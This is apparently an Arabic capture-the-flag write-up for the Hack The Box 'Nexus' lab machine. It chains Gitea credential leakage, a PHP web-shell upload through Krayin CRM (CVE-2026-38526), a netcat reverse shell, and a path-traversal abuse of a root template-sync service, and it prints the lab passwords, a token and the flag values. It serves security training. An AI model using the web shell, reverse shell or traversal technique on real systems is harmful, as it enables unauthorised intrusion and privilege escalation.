
# كتابة تحليل آلة Nexus من Hack The Box تغطي الاستطلاع، اكتشاف بيانات اعتماد Gitea، استغلال Krayin CRM عبر CVE-2026-38526، الوصول الأولي، ورفع الامتيازات من خلال خدمة مزامنة قوالب Gitea الضعيفة.
الإنجليزية 🇺🇸 | الإسبانية 🇪🇸
Nexus هي آلة لينكس بسهولة متوسطة (Easy) من Hack The Box توضح سلسلة هجوم متعددة المراحل تشمل تعداد المضيفات الافتراضية، كشف بيانات الاعتماد، استغلال وظائف تطبيق ويب ضعيفة، تنفيذ الأكواد عن بُعد، إعادة استخدام بيانات الاعتماد، وتصعيد الصلاحيات محليًا.
الاستطلاع
│
▼
تعداد المضيفات الافتراضية
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
سجل التزامات Gitea
│
▼
بيانات اعتماد مكشوفة
│
▼
تسجيل دخول Krayin CRM
│
▼
CVE-2026-38526
│
▼
قشرة PHP
│
▼
قشرة عكسية
(www-data)
│
▼
ملف .env للتطبيق
│
▼
SSH بصلاحية jones
│
▼
gitea-template-sync
│
▼
اجتياز المسار
│
▼
مستودع Git خبيث
│
▼
SSH بصلاحية root
rootعنوان IP المستهدف: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
أضف المضيفات المكتشفة إلى /etc/hosts:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
انتقل إلى:
http://git.nexus.htb
مستودع باسم:
admin/krayin-docker-setup
يحتوي على معلومات مفيدة في سجل Git الخاص به.
يمكن استعادة ملف .env من الالتزامات السابقة، مما يكشف عن بيانات اعتماد لم تعد موجودة في النسخة الحالية.
| الخدمة | اسم المستخدم | كلمة المرور |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
كما تم تحديد عنوان البريد الإلكتروني [email protected] في قسم التوظيف بالموقع الرئيسي.
URL: http://billing.nexus.htb/admin/login
Email: [email protected]
Password: N27xh!!2ucY04
انتقل إلى:
/admin/mail/sent
ثم:
يتم تخزين الحمولة في:
exploits/CVE-2026-38526/shell.php
الحمولة:
<?php system($_GET["cmd"]); ?>
حقول multipart ذات الصلة هي:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
بعد الرفع الناجح:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
النتيجة المتوقعة:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ابدأ مستمعًا:
nc -lvnp 4444
ثم قم بتشغيل القشرة العكسية عبر القشرة المرفوعة.
تتوفر نسخة Python في:
exploits/CVE-2026-38526/reverse_shell.py
في هذه المرحلة يتم الحصول على القشرة بصلاحية:
www-data
افحص إعدادات Krayin:
cat /var/www/krayin/.env
يتم العثور على بيانات الاعتماد:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
يتم تحديد حساب jones.
كلمة المرور:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
يتم تحديد الخدمة والمؤقت التاليين:
gitea-template-sync.timer
gitea-template-sync.service
تعمل الخدمة بصلاحيات مرتفعة.
/etc/gitea/template-sync.py
تستخدم آلية المزامنة بناء مسار يمكن استغلاله عبر اجتياز المسار.
أنشئ زوج مفاتيح SSH:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
يقع استغلال معالجة كائنات Git في:
exploits/gitea_template_sync/exploit_git.py
أنشئ المستودع:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
يجب أن يستخدم المستودع فرع:
main
أنشئ رمز وصول شخصي عبر:
http://git.nexus.htb
انتقل إلى:
Settings → Applications
ثم قم بتكوين الريبو البعيد:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
ادفع المستودع الخبيث:
git push -f origin main
راقب سجل المزامنة:
tail -f /var/log/template-sync.log
تؤدي المزامنة الناجحة إلى معالجة شجرة Git الخبيثة بواسطة الخدمة المميزة.
مثال:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
بمجرد كتابة المفتاح العام SSH في حساب الجذر:
ssh -i /tmp/nexus_root [email protected]
تحقق من الوصول:
whoami
المتوقع:
root
استرجع علم الجذر:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| العلم | القيمة |
|---|---|
| المستخدم | f20cbf9aeb6bb228d356a42ff49c1933 |
| الجذر | 85be1d2a3084e387da0e7dd118908c63 |
تنتمي بيانات الاعتماد هذه إلى بيئة مختبر Hack The Box الموثقة في هذا المستودع.
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
هذا المستودع مخصص لأغراض تعليمية واختبارات الأمان المصرح بها فقط.
يجب عدم استخدام التقنيات وبيانات الاعتماد والاستغلالات والأوامر الموثقة هنا ضد أي أنظمة دون إذن صريح.
root ناقلًا لتصعيد الصلاحيات.⭐ إذا وجدت هذا الشرح مفيدًا، فكر في منح المستودع نجمة.
| الخدمة | اسم المستخدم | كلمة المرور / المفتاح |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| رمز Gitea | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH الجذر | root | /tmp/nexus_root |
| الأداة | الغرض |
|---|
| Nmap | تعداد المنافذ والخدمات |
| Gobuster | تعداد المضيفات الافتراضية |
| Burp Suite | اعتراض وتعديل طلبات HTTP |
| Git | تحليل المستودعات وإنشاء مستودع خبيث |
| Python 3 | سكربتات الاستغلال |
| Netcat | مستمع القشرة العكسية |
| LinEnum | تعداد لينكس |
| LinPEAS | تعداد تصعيد الصلاحيات |
| SSH | الوصول عن بُعد |